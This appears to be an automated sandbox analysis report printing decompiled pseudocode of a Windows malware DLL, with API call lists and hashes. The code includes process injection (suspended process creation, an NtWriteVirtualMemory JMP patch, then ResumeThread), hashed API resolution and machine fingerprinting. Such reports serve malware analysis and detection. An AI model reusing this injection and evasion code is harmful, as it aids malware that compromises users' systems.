Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

0x10005f82
0x10005f92
0x10005f9c
0x100060d0
0x100060c3
0x00000000
0x100060c5
0x100060d7
0x10006098
0x00000000
0x10006098
0x10005fa2
0x10005faa
0x10005fb1
0x10005fb3
0x00000000
0x10005fc6
0x10005fc6
0x10005fcc
0x10005fd2
0x10005fe2
0x10005fe7
0x10005fef
0x10005ff7
0x10006013
0x10006018
0x1000601b
0x1000601d
0x1000601f
0x1000602c
0x10006035
0x1000603e
0x10006043
0x10006044
0x10006052
0x1000605c
0x1000606d
0x10006072
0x10006079
0x10006080
0x10006083
0x1000608f
0x10006090
0x1000609c
0x100060a5
0x100060b7
0x100060ba
0x100060c1
0x00000000
0x00000000
0x00000000
0x100060c1
0x10006092
0x10006097
0x00000000
0x10005ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x8abfaa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x8abfaa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

0x1000cb83
0x1000cb85
0x1000cb87
0x1000cb90
0x1000cb9b
0x1000cba0
0x1000cba4
0x1000cbb8
0x1000cbc0
0x1000cbd0
0x1000cbd1
0x1000cbd6
0x1000cbe1
0x1000cbe7
0x1000cbef
0x1000cbfd
0x1000cc03
0x1000cc04
0x1000cc10
0x1000cc17
0x1000cc27
0x1000cc67
0x1000cc67
0x1000cc46
0x1000cc46
0x1000cc65
0x00000000
0x00000000
0x1000cc65
0x1000cc27
0x1000cbe1
0x1000cba4
0x1000cc69
0x1000cc70
0x1000cc73
0x1000cc79
0x1000cc79
0x1000cc80
0x1000cc87
0x1000cc8a
0x1000cc8f
0x1000cc9c
0x1000cca2
0x1000cca9

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x8abfaa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x8abfaa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

0x1000aba3
0x1000abbb
0x1000abbd
0x1000abc0
0x1000abc2
0x1000abc7
0x1000abd6
0x1000abde
0x1000abf2
0x1000ac02
0x1000ac08
0x1000ac0d
0x1000ac13
0x00000000
0x00000000
0x1000ac15
0x1000ac26
0x00000000
0x00000000
0x00000000
0x1000ac26
0x1000ac2e
0x1000ac35
0x1000abf4
0x1000abf4
0x1000abfa
0x1000abff
0x1000abff
0x1000abf2
0x1000ac3e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x1000dfb6
0x1000dfb8
0x1000dfbb
0x1000dfbe
0x1000dfc4
0x1000e021
0x00000000
0x1000e021
0x1000dfc6
0x1000dfd1
0x1000dfd4
0x1000dfd9
0x1000dfde
0x1000dfe1
0x1000dfe3
0x1000dfe6
0x1000dfe9
0x1000dfee
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dff0
0x1000dff0
0x1000e002
0x1000e00f
0x1000e013
0x00000000
0x00000000
0x1000e015
0x1000e018
0x1000e019
0x1000e01f
0x00000000
0x00000000
0x00000000
0x1000e01f
0x1000e036
0x1000e03b
0x1000e03f
0x00000000
0x1000e04b
0x1000e04b
0x1000e04d
0x1000e04d
0x1000e053
0x00000000
0x00000000
0x1000e059
0x1000e05d
0x1000e061
0x00000000
0x00000000
0x00000000
0x1000e061
0x1000e067
0x1000e06f
0x1000e074
0x1000e077
0x1000e077
0x1000e079
0x1000e07d
0x1000e085
0x00000000
0x00000000
0x1000e089
0x1000e091
0x00000000
0x00000000
0x00000000
0x1000e091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

0x1000b7a8
0x1000b7b1
0x1000b7bd
0x1000b7c3
0x1000b7c5
0x1000b7cd
0x1000b7e0
0x1000b7ef
0x1000b7fa
0x1000b807
0x1000b821
0x1000b826
0x1000b828
0x1000b82f
0x1000b83f
0x1000b850
0x1000b85a
0x1000b862
0x1000b869
0x1000b86c
0x1000b889

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x8a40590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x8abfaa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x8abfaa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x8abfaa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x8abfaa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x8abfaa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x8abfaa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

0x1000ca2b
0x1000ca34
0x1000ca37
0x1000ca39
0x1000ca3e
0x1000ca40
0x1000ca43
0x1000ca45
0x1000cb76
0x1000cb76
0x1000ca4b
0x1000ca5d
0x1000ca62
0x1000ca65
0x1000ca67
0x1000ca6c
0x1000cb63
0x1000cb69
0x00000000
0x1000cb72
0x1000ca72
0x1000ca7d
0x1000ca8a
0x1000ca8e
0x1000ca8f
0x1000ca90
0x1000ca94
0x1000ca99
0x1000ca9b
0x1000caa8
0x1000cab0
0x1000cabb
0x1000cac6
0x1000caca
0x1000cacc
0x1000cada
0x1000cae2
0x1000cae7
0x1000cae9
0x1000caee
0x1000caf4
0x1000caf6
0x1000caf6
0x1000caf7
0x1000caf7
0x1000cafd
0x1000cafd
0x1000caca
0x1000cab0
0x1000cb04
0x1000cb08
0x1000cb0a
0x1000cb13
0x1000cb13
0x1000cb19
0x1000cb21
0x1000cb24
0x1000cb2c
0x1000cb2c
0x1000cb32
0x1000cb35
0x1000cb36
0x1000cb3c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb3c
0x1000cb42
0x1000cb45
0x1000cb46
0x1000cb4b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb51
0x00000000
0x00000000
0x00000000
0x1000cb51
0x1000cb51
0x1000cb54
0x1000cb5a
0x1000cb5e

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000b99b
0x1000b99c
0x1000b9a3
0x1000b9ab
0x1000b9af
0x1000b9b8
0x1000b9fe
0x1000b9fe
0x1000b9c5
0x1000b9cd
0x1000b9cf
0x1000b9d5
0x1000b9ee
0x00000000
0x1000b9f0
0x1000b9f5
0x00000000
0x1000b9fb
0x1000b9d7
0x1000b9d7
0x1000b9d7
0x1000b9d7
0x1000b9d5
0x1000ba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

